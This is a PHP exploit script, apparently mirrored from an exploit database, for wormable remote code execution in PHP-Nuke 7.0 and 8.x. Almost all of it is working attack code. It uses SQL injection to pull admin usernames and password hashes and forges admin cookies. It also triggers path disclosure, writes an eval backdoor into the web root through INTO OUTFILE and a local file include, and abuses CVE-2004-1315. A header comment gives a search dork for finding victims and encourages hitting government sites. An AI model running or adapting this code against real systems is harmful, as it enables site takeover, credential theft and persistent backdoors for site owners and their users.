PageRenderTime 46ms CodeModel.GetById 17ms RepoModel.GetById 1ms app.codeStats 0ms

/platforms/php/webapps/12510.php

https://github.com/ButtNet/exploit-database
PHP | 548 lines | 494 code | 0 blank | 54 comment | 17 complexity | 8f5eb60bbb13f8afe37f959a819d4b99 MD5 | raw file
  1. #!/usr/bin/php
  2. <?php
  3. /*******************************************************************************
  4. Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35(newist as of release)
  5. Vendor's Website:http://phpnuke.org/
  6. Secuirty Researcher: Michael Brooks (https://sitewat.ch)
  7. Original Advisory: http://blog.sitewat.ch/2010/05/vulnerabilities-in-php-nuke.html
  8. Google hack:
  9. "Francisco Burzi" "Page Generation:" Seconds inurl:modules.php
  10. 1,170,000 results
  11. add inurl:gov to the google hack if you want to make the news ;)
  12. Works with maigic_quotes_gpc=On or Off
  13. Works with AppArmor and Suhosin Hadend-PHP, tested on Ubuntu 9.04 and 10.04
  14. My own LFI+SQLI attack is used to bypass AppArmor!
  15. Also tested XAMPP on Windows XP
  16. All tests where done with MySQL5 and PHP5
  17. To obtain a user's cookie:
  18. 1) Register a normal account
  19. 2) Login
  20. 3) Type this into the same address bar and hit enter: javascript:document.cookie
  21. To set a cookie you can do use this: javascript:document.cookie="admin=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2"
  22. *******************************************************************************/
  23. set_time_limit(0);
  24. //The blind_sql_injeciton calss is a general exploit framework that we are inheriting.
  25. class php_nuke_blind_sql_injection extends blind_sql_injection {
  26. //This is the blind sql injection request.
  27. function query($check){
  28. //Rate limiter to bypass ipban.php's protection.
  29. //Must stay below 5 requests every 2 seconds.
  30. if(!($this->request_count%4)){
  31. sleep(2);
  32. }
  33. //build the http request to Inject a query:
  34. //This is a simple get request with a custom referer
  35. //$this->set_referer("'="/\*" (select ".$check." from nuke_authors limit 1))-- */");
  36. $this->set_referer("'=(select ".$check." from nuke_authors limit 1))-- 1");
  37. /*example get and post request.
  38. *$this->set_get("id=1 or (select ".$check." from nuke_authors limit 1))";//$_GET[id]
  39. *$this->set_post("id=1 or (select ".$check." from nuke_authors limit 1))");//$_POST[id]
  40. */
  41. }
  42. }
  43. //This is a very efficient blind sql injection class.
  44. class blind_sql_injection{
  45. var $url, $backup_url, $result, $http, $request_count, $timeout;
  46. function blind_sql_injection($url,$timeout=10){
  47. $this->request_count=0;
  48. $this->url=$url;
  49. $this->backup_url=$url;
  50. $this->http=new http_client();
  51. $this->timeout=$timeout;
  52. }
  53. function set_get($get){
  54. $this->url=$this->url."?".$get;
  55. }
  56. function set_referer($referer){
  57. $this->http->referer=$referer;
  58. }
  59. function set_post($post){
  60. $this->http->postdata=$post;
  61. }
  62. function test_target(){
  63. return $this->send("if(true,sleep(".$this->timeout."),0)")&&!$this->send("if(false,sleep(".$this->timeout."),0)");
  64. }
  65. function num_to_hex($arr){
  66. $ret='';
  67. foreach($arr as $a){
  68. if($a<=9){
  69. $ret.=$a;
  70. }else{
  71. $ret.=chr(87+$a);
  72. }
  73. }
  74. return $ret;
  75. }
  76. //Looking for a string of length 32 and base 16 in ascii chars.
  77. function find_md5($column){
  78. return $this->num_to_hex($this->bin_finder(16,32,"conv(substring($column,%s,1),16,10)"));
  79. }
  80. function find_sha1($column){
  81. return $this->num_to_hex($this->bin_finder(16,40,"conv(substring($column,%s,1),16,10)"));
  82. }
  83. //Look for an ascii string of arbitrary length.
  84. function find_string($column){
  85. $ret='';
  86. //A length of zero means we are looking for a null byte terminated string.
  87. $result=$this->bin_finder(128,0,"ascii(substring($column,%s,1))");
  88. foreach($result as $r){
  89. $ret.=chr($r);
  90. }
  91. return $ret;
  92. }
  93. //query() is a method that generates the sql injection request
  94. function query($check){
  95. //This function must be overridden.
  96. }
  97. function recheck($result,$question,$base){
  98. $this->bin_finder($base,1,$question,$start);
  99. //Force a long timeout.
  100. $tmp_timeout=$this->timeout;
  101. if($this->timeout<10){
  102. $this->timeout=10;
  103. }else{
  104. $this->timeout=$this->timeout*2;
  105. }
  106. $l=1;
  107. foreach($result as $r){
  108. if($this->send("if(".sprintf($question,$l)."!=".$r.",sleep(".$this->timeout."),0)")){
  109. $result[]=$b;
  110. break;
  111. }
  112. $l++;
  113. }
  114. $this->timeout=$tmp_timeout;
  115. }
  116. function linear_finder($base,$length,$question){
  117. for($l=1;$l<=$length;$l++){
  118. for($b=0;$b<$base;$b++){
  119. if($this->send("if(".sprintf($question,$l)."=".$b.",sleep(".$this->timeout."),0)")){
  120. $result[]=$b;
  121. break;
  122. }
  123. }
  124. }
  125. }
  126. #Binary search for mysql based sql injection.
  127. function bin_finder($base,$length,$question){
  128. $start_pos=1;
  129. $result='';
  130. for($cur=$start_pos;$cur<=$length||$length==0;$cur++){
  131. $n=$base-1;
  132. $low=0;
  133. $floor=$low;
  134. $high=$n-1;
  135. $pos= $low+(($high-$low)/2);
  136. $found=false;
  137. while($low<=$high&&!$found){
  138. #asking the sql database if the current value is greater than $pos
  139. if($this->send("if(greatest(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){
  140. #if this is true then the value must be the modulus.
  141. if($pos==$n-1){
  142. $result[]=$pos+1;
  143. $found=true;
  144. }else{
  145. $low=$pos+1;
  146. }
  147. #asking the sql database if the current value is less than $pos
  148. }else if($this->send("if(least(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){
  149. #if this is true the value must be zero, or in the case of ascii, a null byte.
  150. if($pos==$floor+1){
  151. $found=true;
  152. #We have found the null terminator so we have finnished our search for a string.
  153. if($length==0){
  154. $length=-1;
  155. }else{
  156. $result[]=$pos-1;
  157. }
  158. }else{
  159. $high=$pos-1;
  160. }
  161. }else{
  162. #both greater than and less then where asked, so so then the answer is our guess $pos.
  163. $result[]=$pos;
  164. $found=true;
  165. }
  166. $pos=$low+(($high-$low)/2);
  167. }
  168. print(".");
  169. }
  170. return $result;
  171. }
  172. //Fire off the request
  173. function send($quesiton){
  174. //build the injected query.
  175. $this->query($quesiton);
  176. $start=time();
  177. $resp=$this->http->send($this->url);
  178. //backup_url is for set_get()
  179. $this->url=$this->backup_url;
  180. $this->request_count++;
  181. return (time()-$start>=$this->timeout);
  182. }
  183. //retroGod RIP
  184. function charEncode($string){
  185. $char="char(";
  186. $size=strlen($string);
  187. for($x=0;$x<$size;$x++){
  188. $char.=ord($string[$x]).",";
  189. }
  190. $char[strlen($char)-1]=")%00";
  191. return $char;
  192. }
  193. }
  194. //General purpose http client that works on a default php install.
  195. class http_client{
  196. var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='', $referer='',$cookie='',$postdata='';
  197. function send($loc){
  198. //overload function polymorphism between gets and posts
  199. $url=parse_url($loc);
  200. if(!isset($url['port'])){
  201. $url['port']=80;
  202. }
  203. $ua='Firefox';
  204. if($this->proxy_ip!=''&&$this->proxy_port!=''){
  205. $fp = pfsockopen( $this->proxy_ip, $this->proxy_port, &$errno, &$errstr, 120 );
  206. $url['path']=$url['host'].':'.$url['port'].$url['path'];
  207. }else{
  208. $fp = fsockopen( $url['host'], $url['port'], &$errno, &$errstr, 120 );
  209. }
  210. if( !$fp ) {
  211. print "$errstr ($errno)<br>\nn";
  212. return false;
  213. } else {
  214. if( $this->postdata=='' ) {
  215. $request="GET ".$url['path']."?".$url['query']." HTTP/1.1\r\n";
  216. } else {
  217. $request="POST ".$url['path']."?".$url['query']." HTTP/1.1\r\n";
  218. }
  219. if($this->proxy_name!=''&&$this->proxy_pass!=''){
  220. $request.="Proxy-Authorization: Basic ".base64_encode($this->proxy_name.":".$this->proxy_pass)."\r\n\r\n";
  221. }
  222. $request.="Host: ".$url['host'].":".$url['port']."\r\n";
  223. $request.="User-Agent: ".$ua."\r\n";
  224. $request.="Accept: text/plain\r\n";
  225. if($this->referer!=''){
  226. $request.="Referer: ".$this->referer."\r\n";
  227. }
  228. $request.="Connection: Close\r\n";
  229. if($this->cookie!=''){
  230. $request.="Cookie: ".$this->cookie."\r\n" ;
  231. }
  232. if( $this->postdata!='' ) {
  233. $strlength = strlen( $this->postdata );
  234. $request.="Content-type: application/x-www-form-urlencoded\r\n" ;
  235. $request.="Content-length: ".$strlength."\r\n\r\n";
  236. $request.=$this->postdata;
  237. }
  238. fputs( $fp, $request."\r\n\r\n" );
  239. while( !feof( $fp ) ) {
  240. $output .= fgets( $fp, 1024 );
  241. }
  242. fclose( $fp );
  243. //php_nuke only:
  244. if(strstr($output,"too many page loads")){
  245. print "REQUEST CAP HIT!\n";
  246. print_r(debug_backtrace());
  247. print "REQUEST CAP HIT!\n";
  248. die();
  249. }
  250. return $output;
  251. }
  252. }
  253. //Use a http proxy
  254. function proxy($proxy){ //user:pass@ip:port
  255. $proxyAuth=explode('@',$proxy);
  256. if(isset($proxyAuth[1])){
  257. $login=explode(':',$proxyAuth[0]);
  258. $this->proxy_name=$login[0];
  259. $this->proxy_pass=$login[1];
  260. $addr=explode(':',$proxyAuth[1]);
  261. }else{
  262. $addr=explode(':',$proxy);
  263. }
  264. $this->proxy_ip=$addr[0];
  265. $this->proxy_port=$addr[1];
  266. }
  267. //Parses the results from a PHP error to use as a path disclosure.
  268. function getPath($url,$pops=1){
  269. $html=$this->send($url);
  270. //Regular error reporting:
  271. $resp=explode("array given in <b>",$html);
  272. if(isset($resp[1])){
  273. $resp = explode("</b>",$resp[1]);
  274. }else{
  275. //xdebug's error reporting:
  276. $resp=explode("array given in ",$html);
  277. if(isset($resp[1])){
  278. $resp = explode(" ",$resp[1]);
  279. }else{
  280. $resp[0]=false;
  281. }
  282. }
  283. $path=$resp[0];
  284. //Can't use dirname()
  285. if(strstr($path,"\\")){
  286. $p=explode("\\",$path);
  287. for($x=0;$x<$pops;$x++){
  288. array_pop($p);
  289. }
  290. $path=implode("\\",$p);
  291. }else{
  292. $p=explode("/",$path);
  293. for($x=0;$x<$pops;$x++){
  294. array_pop($p);
  295. }
  296. $path=implode("/",$p);
  297. }
  298. return $path;
  299. }
  300. //Grab the server type from the http header.
  301. function getServer($url){
  302. $resp=$this->send($url);
  303. $header=explode("Server: ",$resp);
  304. $server=explode("\n",$header[1]);
  305. return $server[0];
  306. }
  307. }
  308. function main(){
  309. $user_input=getopt("t:c:a:");
  310. if($user_input['t']){
  311. $attack_url=$user_input['t'];
  312. if($user_input['c']){
  313. $user_cookie=$user_input['c'];
  314. }
  315. //This is only useful for debugging, so its not listed in the useage.
  316. if($user_input['a']){
  317. $admin_cookie=$user_input['a'];
  318. }
  319. }else{
  320. print("Useage: ./php_exploit -t http://localhost\n");
  321. die("A user's cookie is required for 8.1.35 : ./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
  322. }
  323. $attack_url=str_replace("index.php","",$attack_url);
  324. $http=new http_client();
  325. $sex=new php_nuke_blind_sql_injection($attack_url."/");
  326. if(!$admin_cookie){
  327. //This is what a cookie looks like:
  328. //2:user_name:21232f297a57a5a743894a0e4a801fc3:10::0:0:0:0:DeepBlue:4096
  329. //$user_cookie="user=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2";
  330. if($user_cookie){
  331. print "Using cookie...\n";
  332. $http->cookie=$user_cookie;
  333. //1337+30000 is used as a pivot in parsing, and to test for a sucessful injection.
  334. //This is NOT Blind SQL Injection, we will be reading the result. This attack works with magic_quotes_gpc on or off.
  335. $http->postdata="title=wow\\&bodytext=/*&mood=".urlencode("'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";
  336. $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
  337. //This part of the exploit is a bit strange sorry for the mess, gotta realease!
  338. if(strstr($response,"javascript:history.go(-1)")){
  339. //magic_quotes_gpc=on
  340. $http->postdata="title=wow&jbodytext=text&mood=".urlencode("',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";
  341. $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
  342. $http->postdata='';
  343. //Find the primary key of the journal entry we just created.
  344. $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
  345. //we should have the single quote that we escaped at the end of wow'
  346. $jid=explode("\">wow<",$jid);
  347. $jid=explode("jid=", $jid[0]);
  348. //Check the journal for the admin's username/password hash
  349. $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);
  350. if(strpos($response,"31337")){
  351. list($junk,$aid,$pwd)=explode("31337 @ ",$response);
  352. $aid=explode("<",$aid);
  353. $pwd=explode("<",$pwd);
  354. $user_name=$aid[0];
  355. $pass_hash=$pwd[0];
  356. }else{
  357. //magic_quotes_gpc=off
  358. sleep(3);
  359. $http->postdata="title=wow\\&jbodytext=/*&mood=1&status=".urlencode("no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1")."&submit=Add+New+Entry";
  360. $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
  361. sleep(2);
  362. $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
  363. $jid=explode("\">wow<",$jid);
  364. $jid=explode("jid=", $jid[0]);
  365. $jid=explode("\">",$jid[1]);
  366. //Check the journal for the admin's username/password hash
  367. $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[0]);
  368. $inj=explode("Last updated on ",$response);
  369. $inj=explode(" @ ",$inj[1]);
  370. $pass_hash=$inj[0];
  371. $inj=explode("<",$inj[1]);
  372. $user_name=$inj[0];
  373. }
  374. }else{
  375. $http->postdata='';
  376. //Find the primary key of the journal entry we just created.
  377. $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
  378. //we should have the single quote that we escaped at the end of wow'
  379. $jid=explode("\">wow',<",$jid);
  380. $jid=explode("jid=", $jid[0]);
  381. //Check the journal for the admin's username/password hash
  382. $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);
  383. if(!strpos($response,"31337")){
  384. die("target has patched!\n");
  385. }else{
  386. print "Target vulnerable to a privilege escalation attack!!!\n";
  387. list($junk,$aid,$pwd)=explode("31337 @ ",$response);
  388. $aid=explode("<",$aid);
  389. $pwd=explode("<",$pwd);
  390. $user_name=$aid[0];
  391. $pass_hash=$pwd[0];
  392. }
  393. }
  394. }else{
  395. $sex->sleep="sleep(5)";
  396. print "Starting Attack Against:".$attack_url."/\n";
  397. print "Testing for blind sql injection...\n";
  398. if(!$sex->test_target()){
  399. print("Target might be running 8.1.35\n");
  400. print("Try the privilege esciation attack to upload the shell:");
  401. die("./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
  402. }
  403. print "Target is vulnerable to blind sql injection!!!\n";
  404. print "Please Standby For Attack...\n";
  405. $pass_hash=$sex->find_md5("pwd");
  406. $user_name=$sex->find_string("aid");
  407. print "attacked used:".$sex->request_count." requests.\n";
  408. }
  409. print "Found Admin's name:".$user_name."\n";
  410. print "Found MD5 Password hash:".$pass_hash."\n";
  411. $admin_cookie="admin=".base64_encode($user_name.":".$pass_hash.":").";";
  412. }
  413. print "Using Admin Session ID:\n".$admin_cookie."\n";
  414. $http->cookie=$admin_cookie;
  415. //ipban.php
  416. sleep(3);
  417. //This request will tell us what version of php-nuke it is.
  418. //If it is 8, Then the page gives us configuration information to perserve.
  419. $admin_options=$http->send($attack_url."/admin.php?op=general");
  420. if(!strstr($admin_options,"Content-Length: 0")){
  421. print "PHP-Nuke 8 detected.\n";
  422. $option_values=explode("value='",$admin_options);
  423. $x=0;
  424. array_shift($option_values);
  425. //Parsing out and storing configuration values to restore them after the hack.
  426. foreach( $option_values as $value){
  427. $value=explode("'",$value);
  428. $values[]=urlencode($value[0]);
  429. if($x++==4)
  430. break;
  431. }
  432. //ipban.php
  433. sleep(2);
  434. //Enable error reporting
  435. $http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=1&op=savegeneral";
  436. $error_reporting=$http->send($attack_url."/admin.php");
  437. //Path diclosure in add_pwd. We will trigger a warning by passing md5() the array add_pwd[].
  438. $http->postdata="add_name=junk&add_aid=junk&add_email=junk&add_url=junk&add_admlanguage=&auth_modules%5B%5D=23&add_radminsuper=1&add_pwd[]=junk&op=AddAuthor";
  439. $remote_path=$http->getPath($attack_url."/admin.php",3);
  440. sleep(2);
  441. if(strstr($remote_path,':\\')){
  442. print "Windows box detected.\n";
  443. print "Remote path:$remote_path\n";
  444. print "Uploading backdoor...\n";
  445. $remote_path=addslashes(addslashes($remote_path."\\frontend.php"));
  446. $backdoor='get_magic_quotes_gpc()?eval(stripslashes($_GET["e"])):eval($_GET["e"])';
  447. //Could have used a concat but php-nuke filters for it. This hides <> from the xss filter.
  448. //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php
  449. $http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '".$remote_path."'-- 1");
  450. $re=$http->send($attack_url."/admin.php?op=modifyUser");
  451. //Disable error reporting
  452. $http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=0&op=savegeneral";
  453. $error_reporting=$http->send($attack_url."/admin.php");
  454. }else{
  455. print "*nix box detected.\n";
  456. print "Remote path:$remote_path\n";
  457. //Is mysql on the same machine as the httpd?
  458. sleep(2);
  459. $http->postdata="chng_uid=".urlencode("' or 1=(select if(substring(load_file('".$remote_path."/index.php'),1,1)='<',0,1))-- 1");
  460. $mysql_check=$http->send($attack_url."/admin.php?op=modifyUser");
  461. if(strstr($mysql_check,"User Doesn't Exists!")){
  462. print("MySQL isn't on the same machine or you do not have file privileges.\n");
  463. die("Remote code execution failed\n");
  464. }
  465. print "Uploading backdoor...\n";
  466. //ipban.php
  467. sleep(2);
  468. //Grab the theme, this is needed to repair the database after the LFI
  469. $theme=$http->send($attack_url."/admin.php?op=themes");
  470. $theme=explode('src="themes/',$theme);
  471. $theme=explode('/images/',$theme[1]);
  472. //Repair the database after the LFI.
  473. $backdoor_installer='function OpenTable(){} function themeheader(){} $db->sql_query("update ".$prefix."_config set Default_Theme='.$sex->charEncode($theme[0]).', display_errors=0");';
  474. //This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.
  475. $backdoor='get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';
  476. //Install the backdoor in a relitive directory.
  477. $backdoor_installer.='file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php '.$backdoor.'?".chr(62));';
  478. //charEncode is used to bypass XSS filters.
  479. //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php
  480. $http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor_installer."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '/tmp/theme.php'-- 1");
  481. $http->send($attack_url."/admin.php?op=modifyUser");
  482. sleep(2);
  483. //local file include vulnerablity to execute /tmp/theme.php
  484. $http->postdata="xDefault_Theme=../../../../../../../../../../../tmp&xoverwrite_theme=0&op=savethemes";
  485. $http->send($attack_url."/admin.php");
  486. sleep(2);
  487. $http->postdata='';
  488. //Fire off a get request to trigger the uploaded php file using LFI
  489. $http->send($attack_url);
  490. sleep(2);
  491. //Try the LFI again, just in case.
  492. $http->send($attack_url."/admin.php");
  493. }
  494. sleep(2);
  495. //test if the backdoor works, try and clean up after the exploit.
  496. $test_backdoor=$http->send($attack_url."/frontend.php?e=".urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));
  497. if(strstr($test_backdoor,"31337")){
  498. print "Remote Code execution tested successfully:\n".$attack_url."/frontend.php?e=phpinfo()".urlencode(';')."\n";
  499. }else{
  500. print "Backdoor install failed!\n";
  501. }
  502. }else{
  503. ////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.
  504. print "PHP-Nuke 7 detected.\n";
  505. $http->postdata="";//send get requests.
  506. //Fire off a check for CVE-2004-1315, phpbb maybe installed.
  507. //This is more like the oringal CVE-2004-1315: %2527.printf(20041315).%2527
  508. //php-nuke was not vulnerable to this because of mainfile line 50: \([^>]*"?[^)]*\)
  509. //to byapss this check double urlencode the parren () %2527.printf%252820041315%2529.%2527
  510. $try_exploit=$http->send($attack_url."/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%2527");
  511. //if the exploit didn't work, then we might have to enable phpbb and populate it.
  512. if(!strstr($try_exploit,"20041315")){
  513. //Enalbe PHPBB
  514. $http->send($attack_url."/admin.php?op=module_status&mid=22&active=1");
  515. //create a new category for phpbb
  516. $http->postdata="mode=addcat&categoryname=test&addcategory=Create+new+category";
  517. $t=$http->send($attack_url."/modules/Forums/admin/admin_forums.php");
  518. //ipban.php
  519. sleep(2);
  520. //create a new form in the new category
  521. $http->postdata="forumname%5B1%5D=t&addforum%5B1%5D=Create+new+forum&categoryname=test";
  522. $t=$http->send($attack_url."/modules/Forums/admin/admin_forums.php?");
  523. $http->postdata="forumname=t&forumdesc=t&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create+new+forum";
  524. $http->send($attack_url."/modules/Forums/admin/admin_forums.php?");
  525. //create a new topic in the new form
  526. $http->postdata="username=t&subject=t&addbbcode18=%23444444&addbbcode20=12&helpbox=Insert+URL%3A+%5Burl%5Dhttp%3A%2F%2Furl%5B%2Furl%5D+or+%5Burl%3Dhttp%3A%2F%2Furl%5DURL+text%5B%2Furl%5D++%28alt%2Bw%29&message=test&mode=newtopic&f=1&post=Submit";
  527. $http->send($attack_url."/modules.php?name=Forums&file=posting");
  528. //ipban.php
  529. sleep(2);
  530. //access the first topic.
  531. $http->postdata="";
  532. //Check to see if any of the first 10 topics are exploitable.
  533. for($t=1;$t<10&&!strstr($try_exploit,"20041315");$t++){
  534. //Fire off a check for CVE-2004-1315.
  535. $try_exploit=$http->send($attack_url."/modules.php?name=Forums&file=viewtopic&t=".$t."&highlight=%2527.printf%252820041315%2529.%2527");
  536. }
  537. }
  538. //Check if we where able to hit CVE-2004-1315.
  539. if(strstr($try_exploit,"20041315")){
  540. print("Remote Code execution tested successfully:\n".$attack_url."/modules.php?name=Forums&file=viewtopic&t=".--$t."&highlight=%2527.phpinfo%2528%2529.%2527\nThis is a Doulbe urlencode()\n");
  541. }else{
  542. print("Remote code execution has failed!\n");
  543. }
  544. }
  545. }
  546. main();
  547. ?>